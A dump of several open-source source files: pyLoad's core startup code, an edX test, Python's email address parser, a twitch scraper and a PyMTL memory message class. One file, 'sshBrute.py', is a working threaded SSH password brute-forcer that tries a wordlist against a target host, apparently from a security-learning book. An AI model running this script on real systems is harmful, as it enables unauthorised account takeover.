"setup", "configdir=", "changedir", "daemon",
"quit", "status", "no-remote","pidfile="])
for option, argument in options:
if option in ("-v", "--version"):
print "pyLoad", CURRENT_VERSION
exit()
elif option in ("-p", "--pidfile"):
self.pidfile = argument
elif option == "--daemon":
self.daemon = True
elif option in ("-c", "--clear"):
self.deleteLinks = True
elif option in ("-h", "--help"):
self.print_help()
exit()
elif option in ("-d", "--debug"):
self.doDebug = True
elif option in ("-u", "--user"):
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.set_user()
exit()
elif option in ("-s", "--setup"):
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.start()
exit()
elif option == "--changedir":
from module.setup import Setup
self.config = ConfigParser()
s = Setup(pypath, self.config)
s.conf_path(True)
exit()
elif option in ("-q", "--quit"):
self.quitInstance()
exit()
elif option == "--status":
pid = self.isAlreadyRunning()
if self.isAlreadyRunning():
print pid
exit(0)
else:
print "false"
exit(1)
elif option == "--clean":
self.cleanTree()
exit()
elif option == "--no-remote":
self.remote = False
except GetoptError:
print 'Unknown Argument(s) "%s"' % " ".join(argv[1:])
self.print_help()
exit()
def print_help(self):
print ""
print "pyLoad v%s 2008-2011 the pyLoad Team" % CURRENT_VERSION
print ""
if sys.argv[0].endswith(".py"):
print "Usage: python pyLoadCore.py [options]"
else:
print "Usage: pyLoadCore [options]"
print ""
print "<Options>"
print " -v, --version", " " * 10, "Print version to terminal"
print " -c, --clear", " " * 12, "Delete all saved packages/links"
#print " -a, --add=<link/list>", " " * 2, "Add the specified links"
print " -u, --user", " " * 13, "Manages users"
print " -d, --debug", " " * 12, "Enable debug mode"
print " -s, --setup", " " * 12, "Run Setup Assistent"
print " --configdir=<dir>", " " * 6, "Run with <dir> as config directory"
print " -p, --pidfile=<file>", " " * 3, "Set pidfile to <file>"
print " --changedir", " " * 12, "Change config dir permanently"
print " --daemon", " " * 15, "Daemonmize after start"
print " --no-remote", " " * 12, "Disable remote access (saves RAM)"
print " --status", " " * 15, "Display pid if running or False"
print " --clean", " " * 16, "Remove .pyc/.pyo files"
print " -q, --quit", " " * 13, "Quit running pyLoad instance"
print " -h, --help", " " * 13, "Display this help screen"
print ""
def toggle_pause(self):
if self.threadManager.pause:
self.threadManager.pause = False
return False
elif not self.threadManager.pause:
self.threadManager.pause = True
return True
def quit(self, a, b):
self.shutdown()
self.log.info(_("Received Quit signal"))
_exit(1)
def writePidFile(self):
self.deletePidFile()
pid = os.getpid()
f = open(self.pidfile, "wb")
f.write(str(pid))
f.close()
def deletePidFile(self):
if self.checkPidFile():
self.log.debug("Deleting old pidfile %s" % self.pidfile)
os.remove(self.pidfile)
def checkPidFile(self):
""" return pid as int or 0"""
if os.path.isfile(self.pidfile):
f = open(self.pidfile, "rb")
pid = f.read().strip()
f.close()
if pid:
pid = int(pid)
return pid
return 0
def isAlreadyRunning(self):
pid = self.checkPidFile()
if not pid or os.name == "nt": return False
try:
os.kill(pid, 0) # 0 - default signal (does nothing)
except:
return 0
return pid
def quitInstance(self):
if os.name == "nt":
print "Not supported on windows."
return
pid = self.isAlreadyRunning()
if not pid:
print "No pyLoad running."
return
try:
os.kill(pid, 3) #SIGUIT
t = time()
print "waiting for pyLoad to quit"
while exists(self.pidfile) and t + 10 > time():
sleep(0.25)
if not exists(self.pidfile):
print "pyLoad successfully stopped"
else:
os.kill(pid, 9) #SIGKILL
print "pyLoad did not respond"
print "Kill signal was send to process with id %s" % pid
except:
print "Error quitting pyLoad"
def cleanTree(self):
for path, dirs, files in walk(self.path("")):
for f in files:
if not f.endswith(".pyo") and not f.endswith(".pyc"):
continue
if "_25" in f or "_26" in f or "_27" in f:
continue
print join(path, f)
remove(join(path, f))
def start(self, rpc=True, web=True):
""" starts the fun :D """
self.version = CURRENT_VERSION
if not exists("pyload.conf"):
from module.setup import Setup
print "This is your first start, running configuration assistent now."
self.config = ConfigParser()
s = Setup(pypath, self.config)
res = False
try:
res = s.start()
except SystemExit:
pass
except KeyboardInterrupt:
print "\nSetup interrupted"
except:
res = False
print_exc()
print "Setup failed"
if not res:
remove("pyload.conf")
exit()
try: signal.signal(signal.SIGQUIT, self.quit)
except: pass
self.config = ConfigParser()
gettext.setpaths([join(os.sep, "usr", "share", "pyload", "locale"), None])
translation = gettext.translation("pyLoad", self.path("locale"),
languages=[self.config['general']['language'],"en"],fallback=True)
translation.install(True)
self.debug = self.doDebug or self.config['general']['debug_mode']
self.remote &= self.config['remote']['activated']
pid = self.isAlreadyRunning()
if pid:
print _("pyLoad already running with pid %s") % pid
exit()
if os.name != "nt" and self.config["general"]["renice"]:
os.system("renice %d %d" % (self.config["general"]["renice"], os.getpid()))
if self.config["permission"]["change_group"]:
if os.name != "nt":
try:
from grp import getgrnam
group = getgrnam(self.config["permission"]["group"])
os.setgid(group[2])
except Exception, e:
print _("Failed changing group: %s") % e
if self.config["permission"]["change_user"]:
if os.name != "nt":
try:
from pwd import getpwnam
user = getpwnam(self.config["permission"]["user"])
os.setuid(user[2])
except Exception, e:
print _("Failed changing user: %s") % e
self.check_file(self.config['log']['log_folder'], _("folder for logs"), True)
if self.debug:
self.init_logger(logging.DEBUG) # logging level
else:
self.init_logger(logging.INFO) # logging level
self.do_kill = False
self.do_restart = False
self.shuttedDown = False
self.log.info(_("Starting") + " pyLoad %s" % CURRENT_VERSION)
self.log.info(_("Using home directory: %s") % getcwd())
self.writePidFile()
#@TODO refractor
remote.activated = self.remote
self.log.debug("Remote activated: %s" % self.remote)
self.check_install("Crypto", _("pycrypto to decode container files"))
#img = self.check_install("Image", _("Python Image Libary (PIL) for captcha reading"))
#self.check_install("pycurl", _("pycurl to download any files"), True, True)
self.check_file("tmp", _("folder for temporary files"), True)
#tesser = self.check_install("tesseract", _("tesseract for captcha reading"), False) if os.name != "nt" else True
self.captcha = True # checks seems to fail, althoug tesseract is available
self.check_file(self.config['general']['download_folder'], _("folder for downloads"), True)
if self.config['ssl']['activated']:
self.check_install("OpenSSL", _("OpenSSL for secure connection"))
self.setupDB()
if self.config.oldRemoteData:
self.log.info(_("Moving old user config to DB"))
self.db.addUser(self.config.oldRemoteData["username"], self.config.oldRemoteData["password"])
self.log.info(_("Please check your logindata with ./pyLoadCore.py -u"))
if self.deleteLinks:
self.log.info(_("All links removed"))
self.db.purgeLinks()
self.requestFactory = RequestFactory(self)
__builtin__.pyreq = self.requestFactory
self.lastClientConnected = 0
# later imported because they would trigger api import, and remote value not set correctly
from module import Api
from module.HookManager import HookManager
from module.ThreadManager import ThreadManager
if Api.activated != self.remote:
self.log.warning("Import error: API remote status not correct.")
self.api = Api.Api(self)
self.scheduler = Scheduler(self)
#hell yeah, so many important managers :D
self.pluginManager = PluginManager(self)
self.pullManager = PullManager(self)
self.accountManager = AccountManager(self)
self.threadManager = ThreadManager(self)
self.captchaManager = CaptchaManager(self)
self.hookManager = HookManager(self)
self.remoteManager = RemoteManager(self)
self.js = JsEngine()
self.log.info(_("Downloadtime: %s") % self.api.isTimeDownload())
if rpc:
self.remoteManager.startBackends()
if web:
self.init_webserver()
spaceLeft = freeSpace(self.config["general"]["download_folder"])
self.log.info(_("Free space: %s") % formatSize(spaceLeft))
self.config.save() #save so config files gets filled
link_file = join(pypath, "links.txt")
if exists(link_file):
f = open(link_file, "rb")
if f.read().strip():
self.api.addPackage("links.txt", [link_file], 1)
f.close()
link_file = "links.txt"
if exists(link_file):
f = open(link_file, "rb")
if f.read().strip():
self.api.addPackage("links.txt", [link_file], 1)
f.close()
#self.scheduler.addJob(0, self.accountManager.getAccountInfos)
self.log.info(_("Activating Accounts..."))
self.accountManager.getAccountInfos()
self.threadManager.pause = False
self.running = True
self.log.info(_("Activating Plugins..."))
self.hookManager.coreReady()
self.log.info(_("pyLoad is up and running"))
#test api
# from module.common.APIExerciser import startApiExerciser
# startApiExerciser(self, 3)
#some memory stats
# from guppy import hpy
# hp=hpy()
# import objgraph
# objgraph.show_most_common_types(limit=20)
# import memdebug
# memdebug.start(8002)
locals().clear()
while True:
sleep(2)
if self.do_restart:
self.log.info(_("restarting pyLoad"))
self.restart()
if self.do_kill:
self.shutdown()
self.log.info(_("pyLoad quits"))
self.removeLogger()
_exit(0) #@TODO thrift blocks shutdown
self.threadManager.work()
self.scheduler.work()
def setupDB(self):
self.db = DatabaseBackend(self) # the backend
self.db.setup()
self.files = FileHandler(self)
self.db.manager = self.files #ugly?
def init_webserver(self):
if self.config['webinterface']['activated']:
self.webserver = WebServer(self)
self.webserver.start()
def init_logger(self, level):
console = logging.StreamHandler(sys.stdout)
frm = logging.Formatter("%(asctime)s %(levelname)-8s %(message)s", "%d.%m.%Y %H:%M:%S")
console.setFormatter(frm)
self.log = logging.getLogger("log") # settable in config
if self.config['log']['file_log']:
if self.config['log']['log_rotate']:
file_handler = logging.handlers.RotatingFileHandler(join(self.config['log']['log_folder'], 'log.txt'),
maxBytes=self.config['log']['log_size'] * 1024,
backupCount=int(self.config['log']['log_count']),
encoding="utf8")
else:
file_handler = logging.FileHandler(join(self.config['log']['log_folder'], 'log.txt'), encoding="utf8")
file_handler.setFormatter(frm)
self.log.addHandler(file_handler)
self.log.addHandler(console) #if console logging
self.log.setLevel(level)
def removeLogger(self):
for h in list(self.log.handlers):
self.log.removeHandler(h)
h.close()
def check_install(self, check_name, legend, python=True, essential=False):
"""check wether needed tools are installed"""
try:
if python:
find_module(check_name)
else:
pipe = subprocess.PIPE
subprocess.Popen(check_name, stdout=pipe, stderr=pipe)
return True
except:
if essential:
self.log.info(_("Install %s") % legend)
exit()
return False
def check_file(self, check_names, description="", folder=False, empty=True, essential=False, quiet=False):
"""check wether needed files exists"""
tmp_names = []
if not type(check_names) == list:
tmp_names.append(check_names)
else:
tmp_names.extend(check_names)
file_created = True
file_exists = True
for tmp_name in tmp_names:
if not exists(tmp_name):
file_exists = False
if empty:
try:
if folder:
tmp_name = tmp_name.replace("/", sep)
makedirs(tmp_name)
else:
open(tmp_name, "w")
except:
file_created = False
else:
file_created = False
if not file_exists and not quiet:
if file_created:
#self.log.info( _("%s created") % description )
pass
else:
if not empty:
self.log.warning(
_("could not find %(desc)s: %(name)s") % {"desc": description, "name": tmp_name})
else:
print _("could not create %(desc)s: %(name)s") % {"desc": description, "name": tmp_name}
if essential:
exit()
def isClientConnected(self):
return (self.lastClientConnected + 30) > time()
def restart(self):
self.shutdown()
chdir(owd)
# close some open fds
for i in range(3,50):
try:
close(i)
except :
pass
execl(executable, executable, *sys.argv)
_exit(0)
def shutdown(self):
self.log.info(_("shutting down..."))
try:
if self.config['webinterface']['activated'] and hasattr(self, "webserver"):
self.webserver.quit()
for thread in self.threadManager.threads:
thread.put("quit")
pyfiles = self.files.cache.values()
for pyfile in pyfiles:
pyfile.abortDownload()
self.hookManager.coreExiting()
except:
if self.debug:
print_exc()
self.log.info(_("error while shutting down"))
finally:
self.files.syncSave()
self.shuttedDown = True
self.deletePidFile()
def path(self, *args):
return join(pypath, *args)
def deamon():
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
print >> sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# decouple from parent environment
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent, print eventual PID before
print "Daemon PID %d" % pid
sys.exit(0)
except OSError, e:
print >> sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# Iterate through and close some file descriptors.
for fd in range(0, 3):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(os.devnull, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2)
pyload_core = Core()
pyload_core.start()
def main():
#change name to 'pyLoadCore'
#from module.lib.rename_process import renameProcess
#renameProcess('pyLoadCore')
if "--daemon" in sys.argv:
deamon()
else:
pyload_core = Core()
try:
pyload_core.start()
except KeyboardInterrupt:
pyload_core.shutdown()
pyload_core.log.info(_("killed pyLoad from Terminal"))
pyload_core.removeLogger()
_exit(1)
# And so it begins...
if __name__ == "__main__":
main()
|
gpl-3.0
|
jolyonb/edx-platform
|
lms/djangoapps/mobile_api/tests/test_context_processor.py
|
2
|
1087
|
"""
Tests for Django template context processors.
"""
from __future__ import absolute_import
from django.conf import settings
from django.test import TestCase
from django.test.client import RequestFactory
from lms.djangoapps.mobile_api.context_processor import is_from_mobile_app
class MobileContextProcessorTests(TestCase):
"""
Tests for the configuration context processor.
"""
def test_is_from_mobile_app(self):
"""
Verify the context is from mobile app.
"""
request = RequestFactory().get('/')
request.META['HTTP_USER_AGENT'] = settings.MOBILE_APP_USER_AGENT_REGEXES[0]
context = is_from_mobile_app(request)
self.assertEqual(context['is_from_mobile_app'], True)
def test_not_is_from_mobile_app(self):
"""
Verify the context is not from the mobile app.
"""
request = RequestFactory().get('/')
request.META['HTTP_USER_AGENT'] = "Not from the mobile app"
context = is_from_mobile_app(request)
self.assertEqual(context['is_from_mobile_app'], False)
|
agpl-3.0
|
msebire/intellij-community
|
python/lib/Lib/email/_parseaddr.py
|
92
|
14987
|
# Copyright (C) 2002-2007 Python Software Foundation
# Contact: email-sig@python.org
"""Email address parsing code.
Lifted directly from rfc822.py. This should eventually be rewritten.
"""
__all__ = [
'mktime_tz',
'parsedate',
'parsedate_tz',
'quote',
]
import time
SPACE = ' '
EMPTYSTRING = ''
COMMASPACE = ', '
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = data.split()
# The FWS after the comma after the day-of-week is optional, so search and
# adjust for this.
if data[0].endswith(',') or data[0].lower() in _daynames:
# There's a dayname here. Skip it
del data[0]
else:
i = data[0].rfind(',')
if i >= 0:
data[0] = data[0][i+1:]
if len(data) == 3: # RFC 850 date, deprecated
stuff = data[0].split('-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = s.find('+')
if i > 0:
data[3:] = [s[:i], s[i+1:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = mm.lower()
if mm not in _monthnames:
dd, mm = mm, dd.lower()
if mm not in _monthnames:
return None
mm = _monthnames.index(mm) + 1
if mm > 12:
mm -= 12
if dd[-1] == ',':
dd = dd[:-1]
i = yy.find(':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if not yy[0].isdigit():
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = tm.split(':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = int(yy)
dd = int(dd)
thh = int(thh)
tmm = int(tmm)
tss = int(tss)
except ValueError:
return None
tzoffset = None
tz = tz.upper()
if _timezones.has_key(tz):
tzoffset = _timezones[tz]
else:
try:
tzoffset = int(tz)
except ValueError:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
# Daylight Saving Time flag is set to -1, since DST is unknown.
return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset
def parsedate(data):
"""Convert a time string to a time tuple."""
t = parsedate_tz(data)
if isinstance(t, tuple):
return t[:9]
else:
return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
def quote(str):
"""Add quotes around a string."""
return str.replace('\\', '\\\\').replace('"', '\\"')
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of RFC 2822 in
front of you.
Note: this class interface is deprecated and may be removed in the future.
Use rfc822.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.FWS = self.LWS + self.CR
self.atomends = self.specials + self.LWS + self.CR
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
# syntax, so allow dots in phrases.
self.phraseends = self.atomends.replace('.', '')
self.field = field
self.commentlist = []
def gotonext(self):
"""Parse up to the start of the next address."""
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else:
break
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
result = []
while self.pos < len(self.field):
ad = self.getaddress()
if ad:
result += ad
else:
result.append(('', ''))
return result
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(SPACE.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
fieldlen = len(self.field)
self.pos += 1
while self.pos < len(self.field):
self.gotonext()
if self.pos < fieldlen and self.field[self.pos] == ';':
self.pos += 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(SPACE.join(plist) + ' (' +
' '.join(self.commentlist) + ')', routeaddr)]
else:
returnlist = [(SPACE.join(plist), routeaddr)]
else:
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos += 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos += 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = False
self.pos += 1
self.gotonext()
adlist = ''
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = False
elif self.field[self.pos] == '>':
self.pos += 1
break
elif self.field[self.pos] == '@':
self.pos += 1
expectroute = True
elif self.field[self.pos] == ':':
self.pos += 1
else:
adlist = self.getaddrspec()
self.pos += 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC 2822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
if self.field[self.pos] == '.':
aslist.append('.')
self.pos += 1
elif self.field[self.pos] == '"':
aslist.append('"%s"' % self.getquote())
elif self.field[self.pos] in self.atomends:
break
else:
aslist.append(self.getatom())
self.gotonext()
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return EMPTYSTRING.join(aslist)
aslist.append('@')
self.pos += 1
self.gotonext()
return EMPTYSTRING.join(aslist) + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos += 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else:
sdlist.append(self.getatom())
return EMPTYSTRING.join(sdlist)
def getdelimited(self, beginchar, endchars, allowcomments=True):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = False
self.pos += 1
while self.pos < len(self.field):
if quote:
slist.append(self.field[self.pos])
quote = False
elif self.field[self.pos] in endchars:
self.pos += 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
continue # have already advanced pos from getcomment
elif self.field[self.pos] == '\\':
quote = True
else:
slist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(slist)
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', False)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', True)
def getdomainliteral(self):
"""Parse an RFC 2822 domain-literal."""
return '[%s]' % self.getdelimited('[', ']\r', False)
def getatom(self, atomends=None):
"""Parse an RFC 2822 atom.
Optional atomends specifies a different set of end token delimiters
(the default is to use self.atomends). This is used e.g. in
getphraselist() since phrase endings must not include the `.' (which
is legal in phrases)."""
atomlist = ['']
if atomends is None:
atomends = self.atomends
while self.pos < len(self.field):
if self.field[self.pos] in atomends:
break
else:
atomlist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(atomlist)
def getphraselist(self):
"""Parse a sequence of RFC 2822 phrases.
A phrase is a sequence of words, which are in turn either RFC 2822
atoms or quoted-strings. Phrases are canonicalized by squeezing all
runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.FWS:
self.pos += 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.phraseends:
break
else:
plist.append(self.getatom(self.phraseends))
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __iadd__(self, other):
# Set union, in-place
for x in other.addresslist:
if not x in self.addresslist:
self.addresslist.append(x)
return self
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __isub__(self, other):
# Set difference, in-place
for x in other.addresslist:
if x in self.addresslist:
self.addresslist.remove(x)
return self
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addresslist[index]
|
apache-2.0
|
AM-SL/python-codes
|
Python-Chaptering/Chapter-2/3-sshBrute.py
|
2
|
1854
|
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-H <target host> -u <user> -F <password list>'
)
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-F', dest='passwdFile', type='string',\
help='specify password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args=(host, user,\
password, True))
child = t.start()
if __name__ == '__main__':
main()
|
mit
|
MrSprigster/script.module.python.twitch
|
resources/lib/twitch/scraper.py
|
1
|
4491
|
# -*- encoding: utf-8 -*-
"""
Copyright (C) 2012-2016 python-twitch (https://github.com/ingwinlu/python-twitch)
Copyright (C) 2016-2018 script.module.python.twitch
This file is part of script.module.python.twitch
SPDX-License-Identifier: GPL-3.0-only
See LICENSES/GPL-3.0-only for more information.
"""
import sys
import requests
from six.moves.urllib.error import URLError
from six.moves.urllib.parse import quote_plus # NOQA
from six.moves.urllib.parse import urlencode
from .keys import USER_AGENT, USER_AGENT_STRING
from .log import log
from .exceptions import ResourceUnavailableException
from . import methods
try:
import json
except:
import simplejson as json # @UnresolvedImport
SSL_VERIFICATION = True
if sys.version_info <= (2, 7, 9):
SSL_VERIFICATION = False
MAX_RETRIES = 5
def get_json(baseurl, parameters={}, headers={}, data={}, method=methods.GET):
'''Download Data from an URL and returns it as JSON
@param url Url to download from
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@returns JSON Object with data from URL
'''
method = methods.validate(method)
jsonString = download(baseurl, parameters, headers, data, method)
jsonDict = json.loads(jsonString)
log.debug('url: |{0}| parameters: |{1}|\n{2}'.format(baseurl, parameters, json.dumps(jsonDict, indent=4, sort_keys=True)))
return jsonDict
def get_json_and_headers(baseurl, parameters={}, headers={}, data={}, method=methods.GET):
'''Download Data from an URL and returns it as JSON
@param url Url to download from
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@returns JSON Object with data and headers from URL {'response': {}, 'headers': {}}
'''
method = methods.validate(method)
content = download(baseurl, parameters, headers, data, method, response_headers=True)
content['response'] = json.loads(content['response'])
log.debug('url: |{0}| parameters: |{1}|\n{2}'.format(baseurl, parameters, json.dumps(content['response'], indent=4, sort_keys=True)))
return content
def download(baseurl, parameters={}, headers={}, data={}, method=methods.GET, response_headers=False):
'''Download Data from an url and returns it as a String
@param method Request method
@param baseurl Url to download from (e.g. http://www.google.com)
@param parameters Parameter dict to be encoded with url or list of tuple pairs
@param headers Headers dict to pass with Request
@param data Request body
@param method Request method
@param response_headers Include response headers in response {'response': {}, 'headers': {}}
@returns String of data from URL or {'response': {}, 'headers': {}} if response_headers is True
'''
method = methods.validate(method)
if not parameters:
url = baseurl
elif isinstance(parameters, dict):
url = '?'.join([baseurl, urlencode(parameters)])
else:
_parameters = ''
for param in parameters:
_parameters += '{0}={1}&'.format(param[0], quote_plus(str(param[1])))
_parameters = _parameters.rstrip('&')
url = '?'.join([baseurl, _parameters])
log.debug('Downloading: |{0}|'.format(url))
content = ""
for _ in range(MAX_RETRIES):
try:
headers.update({USER_AGENT: USER_AGENT_STRING})
response = requests.request(method=method, url=url, headers=headers, data=data, verify=SSL_VERIFICATION)
content = response.content
if not content:
content = '{{"status": {0}}}'.format(response.status_code)
break
except Exception as err:
if not isinstance(err, URLError):
log.debug('Error |{0}| during HTTP Request, abort'.format(repr(err)))
raise # propagate non-URLError
log.debug('Error |{0}| during HTTP Request, retrying'.format(repr(err)))
else:
raise ResourceUnavailableException('Max retries exceeded')
if isinstance(content, bytes):
content = content.decode('utf-8')
if not response_headers:
return content
else:
return {'response': content, 'headers': response.headers}
|
gpl-3.0
|
jjffryan/pymtl
|
pclib/ifcs/MemMsg.py
|
7
|
5823
|
#=========================================================================
# MemMsg
#=========================================================================
# Contains memory request and response messages.
from pymtl import *
import math
#-------------------------------------------------------------------------
# MemReqMsg
#-------------------------------------------------------------------------
# Memory request messages can either be for a read or write. Read
# requests include an address and the number of bytes to read, while
# write requests include an address, the number of bytes to write, and
# the actual data to write.
#
# Message Format:
#
# 1b addr_nbits calc data_nbits
# +------+-----------+------+-----------+
# | type | addr | len | data |
# +------+-----------+------+-----------+
#
# The message type is parameterized by the number of address and data
# bits. Note that the size of the length field is caclulated from the
# number of bits in the data field, and that the length field is
# expressed in _bytes_. If the value of the length field is zero, then
# the read or write should be for the full width of the data field.
#
# For example, if the address size is 32 bits and the data size is also
# 32 bits, then the message format is as follows:
#
# 66 66 65 34 33 32 31 0
# +------+-----------+------+-----------+
# | type | addr | len | data |
# +------+-----------+------+-----------+
#
# The length field is two bits. A length value of one means read or write
# a single byte, a length value of two means read or write two bytes, and
# so on. A length value of zero means read or write all four bytes. Note
# that not all memories will necessarily support any alignment and/or any
# value for the length field.
class MemReqMsg( BitStructDefinition ):
TYPE_READ = 0
TYPE_WRITE = 1
def __init__( s, addr_nbits, data_nbits ):
s.type_nbits = 1
s.addr_nbits = addr_nbits
s.len_nbits = int( math.ceil( math.log( data_nbits/8, 2) ) )
s.data_nbits = data_nbits
s.type_ = BitField( s.type_nbits )
s.addr = BitField( s.addr_nbits )
s.len = BitField( s.len_nbits )
s.data = BitField( s.data_nbits )
def mk_msg( s, type_, addr, len_, data ):
msg = s()
msg.type_ = type_
msg.addr = addr
msg.len = len_
msg.data = data
return msg
